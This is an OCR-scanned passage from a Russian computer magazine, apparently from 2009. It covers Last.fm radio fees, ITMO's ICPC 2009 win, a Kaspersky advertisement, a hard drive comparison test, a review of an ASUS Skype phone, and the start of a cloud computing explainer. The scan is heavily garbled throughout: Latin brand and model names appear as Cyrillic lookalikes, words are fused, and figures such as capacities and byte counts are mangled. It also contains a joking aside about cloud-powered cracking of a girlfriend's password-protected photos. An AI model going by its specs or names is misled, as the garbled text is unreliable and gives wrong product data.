ков, а потом «ознакомительный период» 
закончится. Месячная подписка на Базі. 
1т обойдется в 3 евро, перечислить 
которые можно посредством РауРаІ. 

Все сказанное касается именно радио, 
а прочие сервисы, то есть — скроблинг, 
рекомендуемые, чарты и т. д., пока оста- 
ются бесплатными. И, конечно, не стоит 
забывать, что прокси никто не отменял. 
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РЕКЛАМА 




Команда ИТМО — чемпионы мира! 



Второй год подряд первое место на миро- 
вом чемпионате по программированию — 
Іпіегпаііопаі. Соііедіаіе Ргодгаттіпд Сопіезі 
(ІСРС 2009] — остается за командой ИТМО. 
Более того, в этом году 3 из 4 золотых медалей 
выиграли российские команды. На прошедшем 
в Стокгольме ІСРС соревновались 100 лучших 



университетских команд мира, отобранных 
из 7109 команд-претендентов 1838 универ- 
ситетов. Первое место досталось команде 
Санкт-Петербургского государственного 
университета информационных технологий, 
механики и оптики, третье — команде Санкт- 
Петербургского государственного универси- 



тета, четвертое — ребятам из Саратовского 
Государственного Университета. А на второе 
место затесались китайцы из университета 
Циньхуа :). Задачей участников было решить 
на время 1 1 сложныхзадач. Золотые призеры 
справилисьс9-ю из них, и больше никому, кро- 
ме китайцев, взять планку в 9 задач неудалось. 



клір:к$к ѵ 

ѵѵѵѵѵѵ.казрегзку.ги 



С такой ЗАЩИТОЙ не страшно! 




ЛЕГАЛИЗУЙСЯ 

со скидкой 30 /о 



Подробности на ІіПр ://ѵѵѵѵ\л/ . каз р е гз ку . г и/І е д а I 






Веб сайт: ѵѵѵѵѵѵ.казрегзку.ги 



Казрегзку 

Іпіегпеі Зесигііу 



защита от вредоносных и шпионских программ 
предотвращение кражи конфиденциальных данных 
противодействие хакерским атакам 
контроль доступа детей к сети интернет 
фильтрация спама 






^ Гегшт 



ЕВГЕНИЙ ПОПОВ 
АЛЕКСЕЙ ШУВАЕВ 

Я НЕ ЗАБУДУ 

НИКОГДА 

Сравнительный тест винчестеров объемом не менее 1 Тб 

Жесткий диск в роли средства хранения и накопления информации — 
пожалуй, самый производительный и дешевый девайс. 

У многих пользователей объемы данных, которые необходимо со- 
хранить и обработать, исчисляются гигабайтами, поэтому винчестер 
емкостью выше 1 Тбуже неявляется роскошью, а переходитв разряд 
необходимости. 



■ ТЕОРЕТИЧЕСКАЯ 
ПОДГОТОВКА 

Жесткие диски обладают различными характе- 
ристиками, одна из которых — емкость. Именно 
по емкости накопителя мы определяем, какое 
количество данных можно сохранить. Однако 
этот параметр постоянно увеличивается и 
зависитнапрямую от плотности записи. Изме- 
ряется она в битах на квадратный дюйм. Нотак 
как мы привыкли мыслить категориями байтов, 
то и в характеристи кахуказывается именно 
объем хранимых данных. Кроме того, ты должен 
знать, что производители частенько хитрят 
и приравнивают 1 килобайткІООО байт, вто 
время, какі Кб= 1024 6. В связи с этим, порой 
возникает путаница, когда после форматиро- 
вания у тебя «пропадает» несколько десятков 
гигабайт. Знай, это упущенные 24 байта всплы- 
вают— а твой винчестер наверняка исправен. 
Вторым важным параметром является время 

•••••••••• 

Тестовое оборудование: 

НіІасЬі ОезкБіаг І-Ш721 01 0КІ.А330 
Беадаіе 5Т31 000340АБ 
БеадаІеБТЗІ 500341 А5 
Батзипд НЕ103Ш 

ѴѴезІегп ОідНаІѴѴОЮЕАОБ СаѵіагѲгееп 
ѴѴезІегп Оідііаі ѴѴР1 001 РАІ.5 Саѵіаг Віаск 



случайного доступа. Таккакв современных 
жестких дисках по-прежнему используется 
магниторезистивный способ записи и чтения 
данных, то физическое перемещение читаю- 
щей головки в нужное место диска и чтение 
информации занимает время. Как правило, 
этот параметр измеряется в миллисекундах или 
мс и составляет порядка 10-20 мс. Чем меньше 
это значение — тем быстрее будет отклик на 
твой запрос. 

Третьим, очень важным, параметром, является 
линейная скорость чтения и записи информа- 
ции. От нее зависит, как быстроты сможешь 
сохранить новый фильм с диска или сколько 
тебе придется ждать при загрузке емкой игры. 

в МЕТОДИКА 
ТЕСТИРОВАНИЯ 

Чтобы проверить характеристики, заявленные 
производителем, и выяснить, какой девайс 
действительно лучше, мы воспользовались 



программой І_аѵа1уз Еѵегезі: ІІШтаіе Есіібоп 
версии 4.60. Утилита служит для сбора инфор- 
мации, а также позволяет проводить тестиро- 
вание по ряду параметров. Линейная скорость 
чтения всегда убывающая,— это ты можешь 
наблюдать на графиках. Плавноеубывание, без 
скачков, будет свидетельством безошибочного 
чтения данных. В связи с ростом энергоэффек- 
тивныхустройств и повышениемтемпературы 
устройств в системном блоке, мы обращали 
внимание на температуру жесткого диска. 
Прогнав все тесты, которые длились порядка 
4-5 часов, мы снимали показания встроенного 
термодатчика и заносили их в сравнительную 
таблицу — малое тепловыделение гаранти- 
рует лучший температурный режим для всех 
устройств компьютера. 



Тестовый стенд: 

Процессор, МГц: 2200, АМйАІІіІоп 643500+(5оске1939| 
Системная плата: АІЬаІгоп К85Ы 
Память, Мб: 2x512, Согзаіг Ѵаіие Беіес* ООР-400 
Видео: А51І5 ЕАХ1 900ХТХ 

Системный винчестер, Гб: 80, Беадаіе Ваггасисіа 7200 грт, ШЕ 
Блок питания, Вт: 450, Ріозіоп 
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ПРИМЕНЕНИЕ НОВЫХТЕХНОЛОГИЙ — ЭФФЕКТИВНО И ЭФФЕКТНО 



ВРЕМЯ СЛУЧАЙНОГО ДОСТУПА, МС 



ННасМ ОезкБІаг Н072ЮЮК1А330 
Беадаіе 5Т31000340А5 
Беадаіе 5Т31500341А5 

Баплзипд НЕ103Ш 

ѴѴезІегп ОідіІаІѴѴОюоіРАІ_5 
Саѵіаг Віаск 

ѴѴезІегп ОідіІаІѴѴОюЕАОБ 
Саѵіаг Огееп 



О 2 
м/с 



ЛИДИРУЮТ ВИНЧЕСТЕРЫ ОТѴѴР 



10 12 14 16 




СКОРОСТЬ РАБОТЫ ВПЕЧАТЛЯЕТ, НО, ПОТРАТИВ ЕЩЕ НЕМНОГО 
ДЕНЕГ, МОЖНО ПОЛУЧИТЬЭКЗЕМПЛЯРС БОЛЬШЕЙ ЕМКОСТЬЮ 



Нііасііі ОезкЗІаг Зеадаіе 

НЭ721 01 0КІ_А330 5Т31000340А5 



Технические характеристики: 

Объем, Гб: 1000 
Интерфейс: 5АТА300 
Объем на одну пластину: 200 Гб 
Скорость вращения, об/мин: 7200 
Объем кэш памяти, Мб: 32 
Количество дисков: 5 
Количество ГОЛОВОК: 10 
Поддержка N00: есть 
Масса, кг: 0,7 

••••••0000 

Правоприемником и владельцем заводов ІВМ по производствужестких 
дисков стала НііасЫ. И руководители компании сказали: «Одному 
терабайту быть». Инженеры не стали бить рекорды плотности записи 
и уместили в боксе девайса сразу 5 пластин по 200 Гб. В этом девайсе 
нашли место наработки и достижения ІВМ. Напри мер, рассматриваемый 
жесткий диск используеттехнологию перпендикулярной записи, кото- 
рая признана достаточно перспективной. К недостаткам можно отнести 
относительно высокий уровеньтемпературы. При отсутствии должного 
охлаждения это негативно скажется на сроке жизни девайса. Кроме 
того.трескмеханизма головок при активной работе с данными может 
докучать и отвлекать. 



Технические характеристики: 

Объем, Гб: 1000 
Интерфейс: 5АТА ЗОО 
Объем на одну пластину: 250 Мб 
Скорость вращения, об/мин: 7200 
Объем кэш памяти, Мб: 32 
Количество дисков: 4 

Количество ГОЛОВОК: 8 
Поддержка N00: есть 
Масса, кг: О, 64 

••••••••00 

«Золотой терабайт» от Беадаіе. Модель довольно популярна за счет 
высоких скоростных показателей и сравнительно небольшой цены. 

В корпусе разместилисьДблина по250 Гб. Применение перпендику- 
лярной за писииеще многих технологий позволило достичь отличных 
показателей. Как итог— выбором многих пользователей (да и редак- 
ции] уже не раз становилась именно эта модель. Малое время доступа 
порадует обладателей большихархивов с мелкими файлами: кпримеру, 
музыкальной коллекции или многочисленных фотоальбомов. Порадова- 
ла довольнотихая работа девайса (даже при частыхзапросах данных]. 
Советуем подумать о дополнительном охлаждении, потому что в систем- 
нике винту будет жар ко — нагреву него, судя по тесту, ощутимый. 
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ПИКОВАЯ СКОРОСТЬ ИНТЕРФЕЙСА 



ТЕМПЕРАТУРА ГРАД. ЦЕЛЬСИЯ 



НіІасГіі ОезкБІаг Н07210ЮКЬА330 
Беадаіе 5Т31000340А5 
Беадаіе 5Т31500341А5 

Батзипд НЕ103Ш 

ѴѴезІегп ОідіІаІѴѴОюоіІ=АІ_5 
Саѵіаг Віаск 

ѴѴезІегп ОідіІаІѴѴОюЕАОБ 
Саѵіаг бгееп 



О 50 100 150 200 250 

Мб/с 



беадаіе 

5Т31 500341 А5 



Технические характеристики: 



6500 руб. 



Объем, Гб: 1500 
Интерфейс: 5 АТА 300 
Объем на одну пластину: 375 Гб 
Скорость вращения, об/мин: 7200 
Объем кэш памяти, Мб: 32 
Количество дисков: 4 
Количество головок: 8 
Поддержка N00: есть 
Масса, кг: 0,68 



О 





ПОЛТОРАТЕРАБАЙТА СЧАСТЬЯ — НЕ МАКСИМУМ. 
МОЖНО НАЙТИ МОДЕЛИ И НА 2 ТБ 



Развитие линейки накопителей от Беадаіе привело ксозданию винчес- 
тера емкостью 1 ,5 Тб. В этой же линейке представлены девайсы объемом 
500, 750 и 1000 Гб, так что можешь подобрать именноту модель, которая 
тебе необходима. Если говорить конкретно об этой, то можно смело 
устанавливать ее в серверы начального уровня или домашние ЫА5-сис- 
темы. Предположения касательно высокой рабочей температуры были 
развеяны после проведенныхтестов — результат в 48 градусов считает- 
ся достойным. Правда, после выхода устройства на рынок был замечен 
опасный глюк — потеря всех данных! Лечится он сменой прошивки или 
походом в сервисный центр, хотя итам не гарантируют сохранность 
информации :). 



НіІасЫРе5к51агН072іОЮКІ_АзЗО 
Беадаіе 5Т31000340А5 
Беадаіе 5Т31500341А5 

Баплзипд НЕ103Ш 

ѴѴезІегп ОідіІаІѴ\ШюоіРАІ_5 
Саѵіаг Віаск 

ѴѴезІегп 0ідіІаІѴ\ШюЕА05 
Саѵіаг бгееп 



0 10 20 30 40 50 60 

Град. Цельсия 

ЧЕМ ВИНТХОЛОДНЕЕ — ТЕМ ОНО ЛУЧШЕ 



Затеипд НЕ103Ш 

Технические характеристики: 

Объем, Гб: 1000 6 5 0 0 руб. 

Интерфейс: 5 АТА 300 
Объем на одну пластину: 334 Гб 
Скорость вращения, об/мин: 7200 
Объем кэш памяти, Мб: 32 
Количество дисков: 3 
Количество головок: 6 
Поддержка N00: есть 
Масса, кг: О, 64 



ООО 




СРАВНИТЕЛЬНО ВЫСОКАЯ ЦЕНАДЕВАЙСА— НЕ НЕДОСТАТОК, А 
ГАРАНТИЯ ВЫСОКОГО КАЧЕСТВА 



Винчестер не для спокойной жизни, но для производительной работы. 
Это видно изтестов и просто при взгляде на цену. Гаджет отлично справ- 
ляется со своей работой в составе ПАЮ-массивов, будьто небольшой 
корпоративный сервер или пользовательское хранилище данных. 
Широкий модельный ряджестких дисков емкостью от 160 до 1000 Гб дает 
возможность выбирать нетолько по объему, но и по имеющейся в карма- 
не сумме. Гарантией качества также служит время наработки на отказ, 
заявленное производителем,— 1 ,2 млн. часов. Почти вдвое больше 
стандартных величин! К недостаткам можно отнести высокий уровень 
шума, характерный именно для этой линейки. 



► 018 
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ЧТЕНИЕ/ЗАПИСЬ. ПИКСКОРОСТЕЙ 



НіІасЫОе5к51агН072ЮіоКІ_АзЗО ■ ѵѵгіів 

5еадаІе5Тзі000340А5 

5еада1е5Т31500341А5 

Затгипд НЕ103Ш 

ѴѴезІегп Оідііаі ѴѴйі 001 РАЬБ 
СаѵіагВІаск 

ѴѴезІегп ОідіІаІѴѴОюЕАОЗ 
Саѵіагбгееп 

О 20 40 60 80 100 120 

Мб/с 

ВЭТОМТЕСТЕТРАДИЦИОННОХОРОШИЕ РЕЗУЛЬТАТЫ ПОКАЗЫВАЮТ 
ВИНЧЕСТЕРЫ 5ЕА0АТЕ 

ѴѴезІегп Оіді«а1 ѴѴЭ 1 0 ЕАЭ5 
Саѵіаг Ѳгееп 

Технические характеристики 

Объем, Гб: 1000 
Интерфейс: 5АТА300 
Объем на одну пластину, Гб: 334 
Скорость вращения, об/мин: 7200 
Объем кэш памяти, Мб: 32 
Количество дисков 3 
Количество головок: 6 
Поддержка N00: есть 
Масса, кг: 0,68 

4400 

•••••••••о 





ПРИЗЫВЫ СОХРАНИТЬ ПРИРОДУ ОКАЗЫВАЮТ ВЛИЯНИЕ 
НА ПРОИЗВОДИТЕЛЕЙ ВИНЧЕСТЕРОВ — ЭНЕРГОЭФФЕКТИВНОСТЬ 
ВОЗВОДИТСЯ В КУЛЬТ 



Борьба за спасение экологии нашла отклик в стане производителей тех- 
ники: сохранять энергию не только необходимо, но и модно. Маркетологи 
не дремлют и на все стороны кричат, что их девайс «самый зеленый и эко- 
номичный». Действительно, девайс показал наудивление высокийуро- 
вень производительности при низких рабочихтемпературах и небольшой 
шумности. Предыдущие модели этой линейки были собраны на четырех 
пластинах, но введение нового техпроцесса позволило обойтисьтремя 
при равном объеме. Немного расстраиваеттолько не самый лучший 
показатель времени доступа — видимо, расплата за энергосбережение. 



ѴѴезІегп йідііаі 

ѴѴЭ1 001 РАІ_5 СаѵіагВІаск 



Технические характеристики: 

Объем, Гб: 1000 
Интерфейс: 5АТА ЗОО 
Объем на одну пластину, Гб: 334 
Скорость вращения, об/мин: 7200 
Объем кэш памяти, Мб: 32 
Количество дисков: 3 
Количество головок: 6 

Поддержка N00: есть 4600 руб. 

Масса, к О, 69 



00 




В МЕРУ ПРОИЗВОДИТЕЛЬНЫЙ И ЭФФЕКТИВНЫЙ ДЕВАЙС 
ОТ ИМЕНИТОГО ПРОИЗВОДИТЕЛЯ 

В противовес «зеленому» винчестеру, ѴѴБ продвигаетлинейку произ- 
водительных накопителей. Использование пластин высокой емкости 
позволило применить всего три блина для достижения порога в 1 Тб. 
Помимо неплохих скоростных показателей, гаджет может похвастаться 
присутствием различных технологий, позволяющих повысить сохран- 
ность данных: например, технологией ИоТоисб, предотвращающей 
контакт головокс дисками при возникновении вибрации. Ну, про сни- 
жение шума и прочие технические моменты можно даже не упоминать. 
Понравились нам и невысокие показатели температуры, позволяющие 
продлить срок службы устройства. Разве что — хотелось бы видеть более 
внушительные результаты скоростныхтестов. 



в ВЫВОДЫ 

Тебеуже нетерпится поставить новый винчес- 
тер в системники запустить десятокза качек 
вторренте?Тогда отберем лучшие модели и 



раздадим награды. Места никогда не бывает 
много, поэтому за емкость и производитель- 
ность мы награждаем Зеадаіе 5Т31 500341 А5 
призом «ВЫБОР РЕДАКЦИИ». И поскольку нам 



также не безразлична судьба планеты, и мы 
думаем о будущих поколениях, то приз «Лучшая 
покупка» достается ѴѴезІегп ОідКаІѴѴОІОЕАОБ 
Саѵіагбгееп. т 
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ИГОРЬ ФЕДЮКИН 



Скайпфон 

А5У5АІ6иги 52 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



Тип: Беспроводной 5куре-фон 
Дисплей: 128х128точек, цветной 

Беспроводная связь: ІЕЕЕ 802.11 Ь/д 

Время автономной работы: 3 ч. (в режиме разговора), 25 ч. (в режиме ожидания) 

Мощность динамика: 0,5 Вт 
Габариты: 116 x 47 x 12.3 мм 

Вес: 72 г 



Если ты активно общаешься с помощью 
программы 5куре, то, наверное, не раз 
задумывался о приобретении специ- 
альной гарнитуры. И если ты до сих пор 
этого не сделал, 5куре-фон от А51І5 
может стать подходящим решением. 
АіОиги 52 — вторая модель 5куре-теле- 
фона отА51І5. Он стал привлекательнее 
не только сточки зрения дизайна, но и 
благодаря расширенной функциональ- 
ности. 

Комплект состоит из трубки и 115В- 
адаптера. Для начала работы требуется 
установить фирменную утилиту с при- 
лагаемого компакт-диска. В процессе 
инсталляции будет предложено подклю- 
чить к компьютеру 05В-адаптер и трубку. 
Софт сам автоматически настроит все 
необходимые параметры соединения, 
после чего можно использовать бес- 
проводной режим. Несмотря на то, что 
трубка использует стандартный для ѴѴі- 
Рі протокол — она функционируеттолько 
с комплектным беспроводным адапте- 
ром. А вотсам адаптер вполне может 
быть переключен из режима работы в 
качестветочки доступа (функционирует 
в нем поумолчанию] в режим обычного 
ѴѴі-Рі адаптера. 

Трубка оснащена достаточно неплохим 
цветным ЖК-дисплеем, где отобра- 
жается текущий статус подключения, 
время, уровень ѴѴіРі -си гнала и зарядки. 
Вообще, по своему внешнему видуА51І5 



АіОиги 52 похож на среднестатисти- 
ческий мобильный образца 4-летней 
давности. 

Скайпофон автоматически подключает- 
ся к адаптеру при запуске 5куре-клиента 
на компьютере. Тут надо подчеркнуть, 
что АіОиги 52 не является автономным 
5куре-клиентом. Он функционирует 
только при успешном соединении 
программного клиента на компьютере. 
После этого с телефона можно про- 
листывать контакт-лист, совершать 
звонки, прослушивать голосовую почту и 
организовывать конференцсвязь. А вот 
отправлять текстовые сообщения с него 
не удастся. Зато можно послушать музы- 
ку с помощью сервисов ѴѴіпсІоѵѵз Мебіа 
и іТипез. Тебе потребуется установить на 
компьютер соответствующие утилиты, и 
после этого можно использовать АіОиги 
52 в качестве своеобразного радио, 
проигрывая музыку, скажем, на кухне. 
Полной зарядки хватает примерно на 
день умеренного использования. Учиты- 
вая, что подзаряжается телефон от порта 
05В — никаких проблем с подзарядкой 
возникнуть не должно. 

В целом, А51І5 АіОиги 52 — весьма 
интересный девайс, который будет 
полезен всем любителям 5куре-об- 
щения. Учитывая невысокую цену и 
довольно стильный внешний вид — его 
смело можно рассматривать в качестве 
неплохого подарка. 
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Если облака — 



На самом деле, облачная обработка данных 
(англ. СІоисІ сотрийпд) — это технология 
обработки данных, в которой программное 
обеспечение предоставляется пользователю 
как интернет-сервис. Пользователь имеет 
доступ к собственным данным, но не может 
управлять операционной системой и соб- 
ственно ПО, с которым работает (заботиться 
об инфраструктуре ему также не нужно]. 
Непосредственно «облаком» называют инет, 
который как раз и скрывает многие техниче- 
ские детали. Это если вкратце. Теперь давай 
посмотрим на все чуть глубже. 

в НА ЧЕМ ВИСИТ ОБЛАКО? 

В основе СІоисІ СотриПіпд лежат несколько 
подходов. Первый — доступность через интер- 
нет. Конечно, бывают и закрытые системы, но, 
как правило, все можно потрогать через сети 
(при этом, «наружу» облако предоставляет себя 
как обычный сервер). Второй важный момент 
— это виртуализация. Благодаря виртуализа- 
ции, пользователи получают столько ресурсов, 
сколько им надо (и, разумеется, сколько могут 
позволить себе приобрести]. Что для этого 
требуется со стороны сервера и каким обра- 
зом он может выделить такие ресурсы — все 
сокрыто за стенами виртуальных машин; 
они могут работать на сотнях и даже тысячах 



серверов, а зачастую — еще и в разных дата- 
центрах. Третий момент: СІоисІ Сотриііпд 
— это услуга. В 60-е годы за машинное время 
приходилось платить и ждать свободного часа. 
В СІоисІ Сотриііпд используется схожий под- 
ход. И пусть стоять в очереди не нужно,— все 
услуги также оплачиваются отдельно. Облако 
для пользователя — это некоторый набор 
услуг, которые потребляются и оплачиваются, 
порой без малейшего представления, что же 
там используется внутри. 

Возьмем самый простой пример — хостинг 
для 5 Гб данных и доступ к ним через НТТР 
РЕ5Т АРІ. Покупая такую услугу, никто не заду- 
мывается, где физически хранятся данные, 
какие накопители и РАЮ используются и т.д. 
Главное, что есть нужный объем данных, кото- 
рый доступен всегда при помощи удобного 
интерфейса. 

Четвертый момент — как ни странно, простота 
и стандартность. Да-да, хотя облачность и стоит 
на переднем крае компьютерных технологий, 
это одно из важнейших ее свойств. Здесь 
никаких тебе новых языков, сложных конфи- 
гурационных файлов и многочасовых сессий 
в терминале для настройки всех демонов. 

Все, что предлагается внутри облака, доступно 
через самые простые вызовы АРІ и протоколы. 
Огромную популярность завоевал так называе- 



мый протокол РЕ5Т, с помощью которого все 
операции надданными можно производить 
через ЫЧр-запросы. Впрочем, применяться 
могут и многие другие решения, более того, 
доступны готовые библиотеки для разных язы- 
ков программирования. 

Теперь простой вопрос — зачем это все нужно? 
Отвечаю. За небольшие, в общем-то, деньги ты 
получаешь доступ к надежнейшей инфраструк- 
туре с необходимой тебе производительностью. 
Іірііте коммерческих систем, как правило, 
гарантируется на уровне трех-пяти девяток 
(99.9% и выше], что означает не больше пары 
минут тире часа простоя в год. Не нужно быть 
семи пядей во лбу, чтобы задействовать такую 
систему — тут используются простые и хорошо 
описанные протоколы и АРІ. И что еще важно 
— практически неограниченные возможности 
по масштабируемости! Приобретая обычный 
хостинг, ты не сможешь прыгнуть выше головы 
и при резком всплеске нагрузки рискуешь 
получить упавший на несколько часов сервис. 

В облаке дополнительные ресурсы предостав- 
ляются по первому запросу. И если твой скрипт 
взлома паролей потребует вдруг для расчета 
еще пару процессоров и гигабайт памяти (под- 
ружка тоже читала наш журнал и закрыла свои 
фотки паролем], то это не станет проблемой. 

И ведь смак в том, что такие ресурсы не надо 
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покупать сразу, оплачивая дикие счета — 
функциональность можно дорастить в любой 
момент. Именно поэтому СІоисІ Сотрибпд — 
это настоящая находка для стартапов, хозяева 
которых заранее не могут предугадать: выстре- 
лит их проект или нет. 

и 5АА5, РАА5... 

ЧУР, НЕ РУГАТЬСЯ! 

Варианты предоставления вычислительных 
мощностей сильно отличаются. Все, что касает- 
ся СІоисІ Сотрибпд, обычно принято называть 
словом ааЗ (ааЗ — две буквы А, не то, что ты 
подумал!]. Расшифровывается просто — «аз 
а Зегѵісе», то есть «как сервис», или «в виде 
сервиса». 

БааБ (ЗоіФл/аге-ааЗ), или приложения в виде 
сервисов — вариант, при котором тебе пред- 
лагают использовать какое-то конкретное ПО, 
например, корпоративные системы, в виде 
сервиса по подписке. Скажем, у предприятия 
нет возможности или желания хостить вну- 
тренний Ехсбапде-сервер для работы почты, 
календарей и т.п.— и оно может купить его 
удаленно, с учетом всей необходимой специ- 
фики. Часто ли такие сервисы доступны просто 
в браузере? Аты пользуешься Соодіе Оосз? Это 
и есть 5аа5, только бесплатный. 

РааБ (РІаіЧогт-ааЭ) — в отличие отЗааЗ, пред- 
назначенного больше для конечного пользова- 
теля, это вариант для разработчиков. В облаке 
функционирует некоторый набор программ, 
основных сервисов и библиотек, на основе 
которых предлагается разрабатывать свои при- 
ложения. Самый яркий пример — платформа 
для создания приложений Соодіе АррЕпдіпе. 
Помимо этого, под РааЗ понимают также 
и отдельные части сложных систем, вроде 
системы базы данных или коммуникаций. 

НааБ (НагсІѵѵаге-ааЗ] — один из первых терми- 
нов, означающих предоставление некоторых 
базовых «железных» функций и ресурсов в виде 
сервисов. Но вместо прямой аренды хостинга 
используется виртуализация. Поэтому, когда 
речь идет о конкретном железе, понимаются 
некоторые абстрактные сущности, аналогичные 
реальным железным (место под хранение, про- 
цессорное время в эквиваленте какого-либо 
реального СРІ), пропускная способность]. 

ІааБ (ІпітазІтисШге-ааЗ] — считается, что тер- 
мин пришел на смену НааЗ, подняв его 
на новый уровень. Для примера — это системы 
виртуализации, балансировщики нагрузки 
и тому подобные системы, лежащие в основе 
построения других систем. 

СааБ (Соттипісабоп-ааБ) — подразумевает- 



6006І.Е АРРЕМ6ШЕ — ОДНА 
ИЗ ЛУЧШИХИ ПРОСТЕЙШИХ 
ПЛАТФОРМ-ПЕСОЧНИЦ ДЛЯ 
РѴТНОІЧДІАѴА ПРИЛОЖЕНИЙ 

ся, что в качестве сервисов предоставляются 
услуги связи; обычно это I Р-телефония, почта 
и мгновенные коммуникации (чаты, ІМ). 

в КАКОГО ЦВЕТА ОБЛАКА? 

Не все так просто в облачном королевстве, 
и сейчас на рынке существует множество 
решений, называющих себя «клаудами». 
Рассмотрим типы архитектур, чтобы легче было 
понять, что это такое. 

Подход к облачным системам различается 
степенью контроля над низким уровнем, кото- 
рый предоставляется клиенту. То есть, если 
за самый низкий (нулевой] вариант мы примем 
личный сервер на площадке у провайдера, 
где ты можешь хоть стразы на лицевую панель 
прицепить, то дальше все уже не так. 

ѴйЗ/ѴРЗ — это уже не просто хостинг, 
но еще никак не СІоисІ. Конечно, утипичного 
ѴйЗ (Ѵігіиаі Оесіісаіесі зегѵег) есть большинство 
атрибутов облака: тебе дают виртуализиро- 
ванную среду, где можно разворачивать свои 
приложения или даже ОС, объем ресурсов 
также ограничивается только твоим кошельком. 
Но на этом сходства и заканчиваются — ресур- 
сы ограничены возможностями железного 
сервера, на котором все крутится. Платишь ты 
тоже помесячно, а если вдруг каждую пятницу 
вечером тебе надо быстро расширить сервер 
для приема толпы посетителей, это никого 
не волнует. 

Первым уровнем для настоящего Сіоиб-а будет 
предоставление виртуализированной среды 
на базе некоторых стандартных «юнитов», кото- 
рые по ресурсам могут равняться на опреде- 
ленные реальные железные сервера (сугубо 
для легкости сравнения и учета). Фактически, 
тебе выдается виртуальная машина, которая 
работает на системах провайдера, а внутри нее 
есть все возможности для установки сначала 
любой ОС (из поддерживаемых, конечно], 
а потом уже настройки необходимого ПО. 
Ограничения такой машины, как уже сказа- 
но, выражаются в некоторых приближениях 
к реальному железу, но, в отличие отѴОЗ, 
могут быть гибко и почти мгновенно изменены 
в большую или меньшую сторону. Также раз- 
решено на один аккаунт поднимать несколько 
таких виртуальных серверов; соответственно, 
можно создать между ними свою сеть. Ты 
по-прежнему не знаешь, что там ниже уров- 



нем, чем слой виртуализации (наиболее часто 
используется Хеп или ѴМѵѵаге], но дальше 
можешь делать все, что захочется. Расширение 
ресурсов также может разниться — самый 
простой вариант, когда тебя не ограничивают 
в количестве таких виртуальных серверов, 
однако их параметры выбираются из несколь- 
ких типовых планов. Пример — Атагоп ЕС2, 
где ты выбираешь из пяти различных типов 
инстансов. Так легче для провайдера, одна- 
ко, не для тебя,— если приложение не умеет 
масштабироваться и добавлять новые сервера 
на лету. «Самый облачный» вариант под- 
разумевает наличие своеобразного ползунка 
(вроде регулятора громкости], с помощью 
которого можно менять количество выделенных 
твоему серверу ресурсов. Понадобилось 12 Гб 
оперативки — передвинул ползунок, и через 
несколько секунды ресурсы сервера стали 
больше. 

На рынке работают компании (к примеру, 
Мо550.сот], предоставляющие как облачные 
сервера, так и другие сервисы, вроде файло- 
вого хранилища или обычного, но высоконад- 
ежного хостинга. Также отмечу Араіапа СІоисІ, 
от разработчиков одной из лучших ЮЕ, Зіах. 
пеі — это если тебе надо только масштабируе- 
мый хостинг Эаѵа-приложения, или Епдіпе УагсІ, 
если любишь побаловаться ВиЬу. 

Разработчики так называемых ѵѵеЬ-05 часто 
позиционируют себя как облака, хотя они 
лишь предоставляют некоторые приложения 
(ЗааЗ-модель] — пусть и не обычный, скажем, 
текстовый редактор, а целое семейство при- 
ложений, объединенных в общий, схожий 
с настольными ОС интерфейс. Такой вирту- 
альный десктоп доступен всегда и везде, был 
бы браузер! Обычно, вебОС работают на базе 
АЗАХ-технологий или ЕІазЬ. Среди интересных 
систем отмечу Сіоисіо ( ѵѵѵѵѵѵ.сіоисіо.сопп ). еуеОБ 
( еѵеоз.ог , также доступна как ОрепЗоигсе] 
и Зоосе ( росе.сот ). 

в ПРОГРАММЫ 
ВЕРХОМ НА ОБЛАКЕ 

Облака третьего типа обладают максимальной 
гибкостью и расширяемостью, но это оборачи- 
вается предоставлением не просто виртуаль- 
ной машины или некоторых ресурсов, но целых 
библиотек и АРІ. Тебе дают возможность 
запускать собственные приложения, часто 
серьезно ограничивая в выборе языка и допол- 
нительных библиотек. Зато такое приложение 
сможет реализовать «заветную мечту всех 
облаков» и гибко получать ресурсы по запро- 
су. Ограничений виртуальной машины ты 
не видишь; более того, не подозреваешь об ее 
существовании: все, с чем работает программа 
— это вызовы АРІ и библиотек, предоставлен- 
ных сервисом. Казалось бы, разве можно что- 
то сделать в таких условиях? Еще как! Вообще, 
такая степень абстракции сейчас модный тренд 
в ІТ. Существует зависимость: чем проще язык 
и АРІ, в рамках которых работают программы, 
тем легче и гибче их масштабировать. Поэтому 
крайне сложно встретить в облачных системах 
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• Если хочешь раз- 
рабатывать серьез- 
ные приложения 
и знаешь баѵа, попро- 
буй ОгісЮаіп ( ѵѵѵѵѵѵ. 
дгібдаіп.сог ). Это 
один из мощнейших 
инструментов для 
создания приложе- 
ний, идеально рабо- 
тающих в облаках. 



• Самые популярные 
языки программиро- 
вания в облачных си- 
стемах: баѵа, РуіНоп, 
баѵаЗсгірІ, Рыбу, С# и, 
с некоторыми ограни- 
чениями - почти все 
языки, которые могут 
работать поверх 6ѴМ. 



Краткий обзор 25 раз- 
личных веб-ОС: 
ЫбрУ/ЬаЬгабаЬг.ги/ 
Ы.одз/оз/1 0952 




> сіѵсі 

Загрузить 

ЕІбСАБУРТІбЗ можно 
с сайта еисаіѵріиз. 
сз.исзЬ.еби и л и же 
взять с нашего диска. 
Там же ты найдешь 
исходные коды 
еуеОЗ. 
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ЕЩЕОДНАОТКРЫТАЯСИСТЕМАУПРАВЛЕ- 
НИЯ ОБЛАЧНЫМИ СИСТЕМАМИ. ХОТЬ НА 
РИСУНКЕ ВСЕ ПРОСТО, ЗА ЭТИМ СКРЫВА- 
ЮТСЯ СЛОЖНЕЙШИЕТЕХНОЛОГИИ 



привычные для веб-разработчиков ресурсы, по крайней 
мере, в стандартном виде. Взять хотя бы базы данных. 
Традиционные ЗОБ-реляционные СУБД крайне плохо под- 
ходят для масштабируемых систем (за редким исключением, 
вроде Огасіе или БВ2). Вместо них используются собствен- 
ные разработки, каждая из которых обычно очень инте- 
ресна в техническом плане, а также — сторонние открытые 
решения. Одним из самых популярных решений стали 
кеу-ѵаіие хранилища данных и системы на базе Соодіе 
ВідТаЫе, а также его открытых аналогов. Это очень похоже 
на обычный кеш — любые данные приложение записывает 
в хранилище, ассоциируя их с некоторым ключом, цифро- 
вым или простой строкой, потом извлекает или удаляет, 
указывая ключ. Более продвинутые системы реализуют 
целые структуры данных, списки, очереди и даже допускают 
приближенные к ЗОБ выборки с сортировкой и фильтрами. 
Зачастую достается и файловой системе, которая заменяет- 
ся подобием привычного хранилища, дополненного систе- 
мой тар/гебисе для обработки больших объемов данных. 
Подобные особенности требуют пересмотра архитектуры 
существующих приложений, когда требуется развернуть 
